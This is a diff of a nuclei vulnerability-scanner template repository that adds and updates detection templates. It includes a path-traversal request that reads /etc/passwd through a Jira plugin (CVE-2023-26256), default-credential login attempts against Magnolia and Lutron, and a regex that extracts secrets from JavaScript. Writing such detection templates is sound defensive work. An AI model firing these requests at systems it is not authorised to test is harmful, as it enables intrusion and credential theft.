- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26256
cwe-id: CWE-22
metadata:
shodan-query: title:Jira
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200

10
default-logins/lutron/lutron-default-login.yaml
View File

@ -1,17 +1,17 @@
id: lutron-default-login
info:
name: Lutron - Default Login
name: Lutron - Default Account
author: geeknik
severity: high
severity: critical
description: Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.lutron.com
- https://vulners.com/openvas/OPENVAS:1361412562310113206
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
tags: default-login,lutron,iot
requests:

75
default-logins/magnolia-default-login.yaml Normal file
View File

@ -0,0 +1,75 @@
id: magnolia-default-login
info:
name: Magnolia Default Login
author: pussycat0x
severity: high
description: Mangnolia CMS default credentials were discovered.
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: html:"Magnolia is a registered trademark"
tags: magnolia,default-login
requests:
- raw:
- |
GET /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
- |
POST /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}};JSESSIONID={{session}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/.magnolia/admincentral
mgnlUserId={{username}}&mgnlUserPSWD={{password}}&csrf={{csrf}}
- |
GET /.magnolia/admincentral/PUSH?v-uiId=1 HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}}; JSESSIONID={{session}}
payloads:
username:
- superuser
password:
- superuser
attack: pitchfork
extractors:
- type: kval
name: csrf
part: header
internal: true
kval:
- csrf
- type: kval
name: session
internal: true
part: header
kval:
- JSESSIONID
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '"changes":'
- '"resources":'
condition: and
- type: word
part: header_3
words:
- 'application/json'
- type: status
status:
- 200

33
exposed-panels/magnolia-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: magnolia-panel
info:
name: Magnolia Panel - Detect
author: pussycat0x
severity: info
description: |
Magnolia CMS is a powerful and versatile content management system that provides users with a host of features and options for web development. It offers a wide range of capabilities to help create a website that is both attractive and effective.
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: html:"Magnolia is a registered trademark"
tags: magnolia,panel,login
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/.magnolia/admincentral"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Magnolia is a registered trademark'
- type: word
part: header
words:
- "text/html"

4
exposed-panels/mybb/mybb-forum-install.yaml
View File

@ -6,8 +6,8 @@ info:
severity: high
description: MyBB installation panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cwe-id: CWE-200
metadata:
verified: true

8
exposed-panels/osticket/osticket-install.yaml
View File

@ -3,12 +3,12 @@ id: osticket-install
info:
name: osTicket Installer Panel - Detect
author: ritikchaddha
severity: high
severity: critical
description: osTicket installer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
cvss-score: 9.4
cwe-id: CWE-284
metadata:
verified: true
shodan-query: http.title:"osTicket Installer"

68
exposed-panels/saltstack-config-panel.yaml
View File

@ -1,34 +1,34 @@
id: saltstack-config-panel
info:
name: SaltStack Config Panel - Detect
author: pussycat0x
severity: info
description: |
SaltStack config panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"SaltStack Config"
tags: panel,vmware,login,saltstack
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SaltStack Config"
- type: status
status:
- 200
# Enhanced by cs 01/26/2023
id: saltstack-config-panel
info:
name: SaltStack Config Panel - Detect
author: pussycat0x
severity: info
description: |
SaltStack config panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"SaltStack Config"
tags: panel,vmware,login,saltstack
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SaltStack Config"
- type: status
status:
- 200
# Enhanced by cs 01/26/2023

4
exposed-panels/solr-panel-exposure.yaml
View File

@ -6,8 +6,8 @@ info:
severity: info
description: Apache Solr admin panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true

26
exposed-panels/veriz0wn-osint.yaml Normal file
View File

@ -0,0 +1,26 @@
id: veriz0wn-osint
info:
name: Veriz0wn OSINT - Detect
author: pussycat0x
severity: info
metadata:
verified: "true"
shodan-query: title:"Veriz0wn"
tags: veriz0wn,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Veriz0wn : OSINT"
- type: status
status:
- 200

70
exposed-panels/wagtail-cms-detect.yaml
View File

@ -1,35 +1,35 @@
id: wagtail-login
info:
name: Wagtail Login - Detect
author: kishore-hariram
severity: info
description: The Wagtail panel has been detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Wagtail - Sign in"
tags: panel,wagtail
requests:
- method: GET
path:
- '{{BaseURL}}/login/?next=/'
- '{{BaseURL}}/admin/login/?next=/admin/'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Wagtail - Sign in'
- type: status
status:
- 200
# Enhanced by cs 01/23/2023
id: wagtail-login
info:
name: Wagtail Login - Detect
author: kishore-hariram
severity: info
description: The Wagtail panel has been detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Wagtail - Sign in"
tags: panel,wagtail
requests:
- method: GET
path:
- '{{BaseURL}}/login/?next=/'
- '{{BaseURL}}/admin/login/?next=/admin/'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Wagtail - Sign in'
- type: status
status:
- 200
# Enhanced by cs 01/23/2023

6
exposures/configs/django-variables-exposed.yaml
View File

@ -10,9 +10,9 @@ info:
- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
- https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200exceptions.yaml
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: exposure,config,django

4
exposures/configs/gruntfile-exposure.yaml
View File

@ -8,8 +8,8 @@ info:
reference:
- https://gruntjs.com/sample-gruntfile
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure

6
exposures/configs/htpasswd-detection.yaml
View File

@ -3,12 +3,12 @@ id: htpasswd-detection
info:
name: Apache htpasswd Config - Detect
author: geeknik
severity: info
severity: high
description: Apache htpasswd configuration was detected.
reference: https://httpd.apache.org/docs/current/programs/htpasswd.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: config,exposure

4
exposures/configs/httpd-config.yaml
View File

@ -7,8 +7,8 @@ info:
description: Apache httpd configuration information was detected.
reference: https://httpd.apache.org/docs/current/configuring.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure,httpd

4
exposures/configs/jetbrains-datasources.yaml
View File

@ -7,8 +7,8 @@ info:
description: Jetbrains IDE DataSources configuration information was detected.
reference: https://www.jetbrains.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure,jetbrains

4
exposures/configs/keycloak-openid-config.yaml
View File

@ -8,8 +8,8 @@ info:
reference:
- https://issues.jboss.org/browse/KEYCLOAK-571
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: keycloak,config

4
exposures/configs/netbeans-config.yaml
View File

@ -8,8 +8,8 @@ info:
reference:
- https://netbeans.apache.org/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: netbeans,config,exposure

4
exposures/configs/owncloud-config.yaml
View File

@ -8,8 +8,8 @@ info:
reference:
- https://owncloud.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure

4
exposures/configs/package-json.yaml
View File

@ -7,8 +7,8 @@ info:
description: npm configuration information was detected. All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
reference: https://www.npmjs.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure

4
exposures/configs/phpsec-config.yaml
View File

@ -7,8 +7,8 @@ info:
description: phpspec configuration information was detected.
reference: https://phpspec.net/en/stable/cookbook/configuration.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true

4
exposures/configs/pipfile-config.yaml
View File

@ -7,8 +7,8 @@ info:
description: Pipfile configuration information was detected.
reference: https://pypi.org/project
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true

4
exposures/configs/rubocop-config.yaml
View File

@ -9,8 +9,8 @@ info:
- https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
- https://github.com/rubocop/rubocop
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true

35
exposures/files/reactapp-env-js.yaml Normal file
View File

@ -0,0 +1,35 @@
id: reactapp-env-js
info:
name: React App Environment Js
author: random-robbie
severity: unknown
metadata:
verified: "true"
github-query: "REACT_APP_"
tags: react,exposure,config,js,javascript
requests:
- method: GET
path:
- "{{BaseURL}}/env.js"
- "{{BaseURL}}/config.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "REACT_APP_"
- type: word
part: header
words:
- "application/octet-stream"
- "application/javascript"
- "text/plain"
condition: or
- type: status
status:
- 200

25
file/audit/pfsense/set-hostname.yaml Normal file
View File

@ -0,0 +1,25 @@
id: set-hostname
info:
name: Ensure Hostname is Set
author: pussycat0x
severity: info
description: |
Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network.
The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it.
reference: |
https://docs.netgate.com/pfsense/en/latest/config/general.html
tags: firewall,config,audit,pfsense,file
file:
- extensions:
- xml
matchers-condition: and
matchers:
- type: word
words:
- "<system>"
- "<hostname></hostname>"
- "domain>"
condition: and

33
file/js/js-analyse.yaml Normal file
View File

@ -0,0 +1,33 @@
id: js-analyse
info:
name: JS Analyse
author: ayadim
severity: info
description: |
This process involves extracting tokens, endpoints, URIs, and variable names from the JS file and analyzing them for any potential weaknesses that could be exploited. By extracting and analyzing these elements, potential security threats can be identified, allowing for proactive measures to be taken to mitigate any risks associated with the application. This process can be used as part of a comprehensive bug-hunting strategy to ensure the security of an application.
metadata:
verified: "true"
tags: file,js-analyse,js,javascript
file:
- extensions:
- js
extractors:
- type: regex
name: extracted-token
regex:
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
- type: regex
name: extracted-endpoints
regex:
- "(?i)('|\")((\\.{0,2})|([a-z0-9-_]*))/([a-z0-9-_/=:&?\\.]+)('|\")"
- "(?i)}\\s*/[a-z0-9-_?=&/]+"
- "(?i)path\\s*(:|=)\\s*('|\")[a-z0-9-_?=&:\\./]+('|\")"
- type: regex
name: extracted-uri
regex:
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+"

2
helpers/wordpress/plugins/all-in-one-seo-pack.txt
View File

@ -1 +1 @@
4.3.2
4.3.3

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
6.4.2
6.4.2.1

2
helpers/wordpress/plugins/custom-css-js.txt
View File

@ -1 +1 @@
3.42
3.43

2
helpers/wordpress/plugins/duplicator.txt
View File

@ -1 +1 @@
1.5.2.1
1.5.3

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.11.3
3.11.5

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
5.6.0
5.6.1

2
helpers/wordpress/plugins/facebook-for-woocommerce.txt
View File

@ -1 +1 @@
3.0.14
3.0.15

2
helpers/wordpress/plugins/fluentform.txt
View File

@ -1 +1 @@
4.3.24
4.3.25

2
helpers/wordpress/plugins/formidable.txt
View File

@ -1 +1 @@
6.1.1
6.1.2

2
helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt
View File

@ -1 +1 @@
7.12.1
7.13.0

2
helpers/wordpress/plugins/google-analytics-for-wordpress.txt
View File

@ -1 +1 @@
8.12.1
8.13.1

2
helpers/wordpress/plugins/google-listings-and-ads.txt
View File

@ -1 +1 @@
2.4.0
2.4.1

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.95.0
1.96.0

2
helpers/wordpress/plugins/gtranslate.txt
View File

@ -1 +1 @@
2.9.15
3.0.2

2
helpers/wordpress/plugins/kadence-blocks.txt
View File

@ -1 +1 @@
3.0.23
3.0.26

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
4.8.0
4.8.1

2
helpers/wordpress/plugins/mainwp-child.txt
View File

@ -1 +1 @@
4.4.0.1
4.4.0.2

2
helpers/wordpress/plugins/members.txt
View File

@ -1 +1 @@
3.2.2
3.2.4

2
helpers/wordpress/plugins/newsletter.txt
View File

@ -1 +1 @@
7.6.7
7.6.8

2
helpers/wordpress/plugins/ninja-forms.txt
View File

@ -1 +1 @@
3.6.19
3.6.20

2
helpers/wordpress/plugins/optinmonster.txt
View File

@ -1 +1 @@
2.12.2
2.13.0

2
helpers/wordpress/plugins/photo-gallery.txt
View File

@ -1 +1 @@
1.8.13
1.8.14

2
helpers/wordpress/plugins/post-smtp.txt
View File

@ -1 +1 @@
2.4.4
2.4.5

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.110
1.0.110.1

2
helpers/wordpress/plugins/so-widgets-bundle.txt
View File

@ -1 +1 @@
1.46.6
1.46.7

2
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
View File

@ -1 +1 @@
2.3.5
2.4.0

2
helpers/wordpress/plugins/updraftplus.txt
View File

@ -1 +1 @@
1.23.1
1.23.3

2
helpers/wordpress/plugins/user-role-editor.txt
View File

@ -1 +1 @@
4.63.2
4.63.3

2
helpers/wordpress/plugins/woocommerce-paypal-payments.txt
View File

@ -1 +1 @@
2.0.2
2.0.3

2
helpers/wordpress/plugins/woocommerce-services.txt
View File

@ -1 +1 @@
2.2.3
2.2.4

2
helpers/wordpress/plugins/woocommerce.txt
View File

@ -1 +1 @@
7.4.1
7.5.0

2
helpers/wordpress/plugins/wordpress-seo.txt
View File

@ -1 +1 @@
20.2.1
20.3

2
helpers/wordpress/plugins/wp-google-maps.txt
View File

@ -1 +1 @@
9.0.17
9.0.18

2
helpers/wordpress/plugins/wp-optimize.txt
View File

@ -1 +1 @@
3.2.12
3.2.13

39
iot/lutron-iot-default-login.yaml
View File

@ -1,39 +0,0 @@
id: lutron-iot-default-login
info:
name: Lutron IOT Device Default Login Panel - Detect
author: geeknik
severity: high
description: Lutron IOT Device Default login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- https://www.lutron.com
tags: iot,default-login,lutron,panel
requests:
- method: GET
path:
- "{{BaseURL}}/login?login=lutron&password=lutron"
matchers-condition: and
matchers:
- type: word
words:
- "<TITLE>LUTRON</TITLE>"
- ">DeviceIP</A>"
- ">Get Database Info as XML</A>"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2023/01/29

2
miscellaneous/addeventlistener-detect.yaml → miscellaneous/addeventlistener-detect
View File

@ -23,5 +23,3 @@ requests:
part: body
regex:
- (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118
# Enhanced by md on 2022/09/19

40
misconfiguration/apache/apache-nifi-unauth.yaml Normal file
View File

@ -0,0 +1,40 @@
id: apache-nifi-unauth
info:
name: Apache NiFi - Unauthenticated Access
author: pwnhxl
severity: high
description: |
Apache NiFi server was able to be accessed because no authentication was required.
reference: |
- https://github.com/jm0x0/apache_nifi_processor_rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cwe-id: CWE-285
metadata:
verified: "true"
shodan-query: title:"NiFi"
fofa-query: title="nifi" && body="Did you mean"
tags: misconfig,apache,nifi,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/nifi-api/access/config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"supportsLogin":false}'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200

2
misconfiguration/command-api-explorer.yaml
View File

@ -3,7 +3,7 @@ id: command-api-explorer
info:
name: Command API Explorer Panel - Detect
author: DhiyaneshDK
severity: low
severity: info
description: Command API Explorer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

2
misconfiguration/dgraph-dashboard-exposure.yaml
View File

@ -3,7 +3,7 @@ id: dgraph-dashboard-exposure
info:
name: Dgraph Ratel Dashboard Exposure Panel - Detect
author: dhiyaneshDk
severity: low
severity: info
description: Dgraph Ratel Dashboard Exposure panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

31
misconfiguration/everything-listing.yaml Normal file
View File

@ -0,0 +1,31 @@
id: everything-listing
info:
name: Everything Server Exposure
author: pussycat0x
severity: high
description: |
Everything is a freeware desktop search utility for Windows that can rapidly find files and folders by name.
reference:
- https://www.voidtools.com/
metadata:
verified: 'true'
shodan-query: http.favicon.hash:-977323269
tags: exposure,everything,listing,voidtools
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Everything</title>"
- "indexof"
condition: and
- type: status
status:
- 200

34
misconfiguration/installer/magnolia-installer.yaml Normal file
View File

@ -0,0 +1,34 @@
id: magnolia-installer
info:
name: Magnolia CMS Installer
author: pussycat0x
severity: info
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: title:"Magnolia Installation"
tags: magnolia,exposure,installer
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "Magnolia Installation"
- "Welcome to Magnolia"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

4
misconfiguration/office365-open-redirect.yaml
View File

@ -3,9 +3,9 @@ id: office365-open-redirect
info:
name: Office365 Autodiscover - Open Redirect
author: dhiyaneshDk
severity: low
severity: medium
description: Office365 Autodiscover contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: See https://learn.microsoft.com/en-us/outlook/troubleshoot/connectivity/how-to-suppress-autodiscover-redirect-warning for a workaround.
remediation: See the workaround detailed in the Medium post in the references.
reference:
- https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168
classification:

6
misconfiguration/pghero-dashboard-exposure.yaml
View File

@ -3,11 +3,11 @@ id: pghero-dashboard-exposure
info:
name: PgHero Dashboard Exposure Panel - Detect
author: DhiyaneshDk
severity: low
severity: medium
description: PgHero Dashboard Exposure panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
reference:
- https://github.com/ankane/pghero

4
misconfiguration/unauth-fastvue-dashboard.yaml
View File

@ -6,8 +6,8 @@ info:
severity: medium
description: Fastvue Dashboard panel was detected without authentication.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
metadata:
verified: true

4
network/mysql-native-password.yaml
View File

@ -8,8 +8,8 @@ info:
reference:
- https://github.com/Tinram/MySQL-Brute
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,mysql,bruteforce,db

4
osint/1001mem.yaml
View File

@ -1,9 +1,9 @@
id: 1001mem
info:
name: 1001mem
name: 1001mem User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 1001mem user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/21buttons.yaml
View File

@ -1,9 +1,9 @@
id: 21buttons
info:
name: 21buttons
name: 21buttons User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 21buttons user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/247sports.yaml
View File

@ -1,9 +1,9 @@
id: 247sports
info:
name: 247sports
name: 247sports User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 247sports user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/3dnews.yaml
View File

@ -1,9 +1,9 @@
id: 3dnews
info:
name: 3DNews
name: 3DNews User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 3DNews user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/3dtoday.yaml
View File

@ -1,9 +1,9 @@
id: 3dtoday
info:
name: 3dtoday
name: 3dtoday User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 3dtoday user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/7cup.yaml
View File

@ -1,9 +1,9 @@
id: 7cup
info:
name: 7cup
name: 7cup User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 7cup user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/7dach.yaml
View File

@ -1,9 +1,9 @@
id: 7dach
info:
name: 7dach
name: 7dach User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 7dach user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/aaha-chat.yaml
View File

@ -1,9 +1,9 @@
id: aaha-chat
info:
name: aaha_chat
name: Aaha chat User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Aaha chat user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/aboutme.yaml
View File

@ -1,9 +1,9 @@
id: aboutme
info:
name: about.me
name: About.me User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: About.me user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/acf.yaml
View File

@ -1,9 +1,9 @@
id: acf
info:
name: ACF
name: ACF User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: ACF user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/admire-me.yaml
View File

@ -1,9 +1,9 @@
id: admire-me
info:
name: admire_me
name: Admire me User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Admire me user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/adult-forum.yaml
View File

@ -1,9 +1,9 @@
id: adult-forum
info:
name: Adult_Forum
name: Adult Forum User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Adult Forum user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/adultism.yaml
View File

@ -1,9 +1,9 @@
id: adultism
info:
name: adultism
name: Adultism User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: Adultism user name information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

4
osint/advfn.yaml
View File

@ -1,9 +1,9 @@
id: advfn
info:
name: ADVFN
name: ADVFN User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: ADVFN user name information check was conducted.
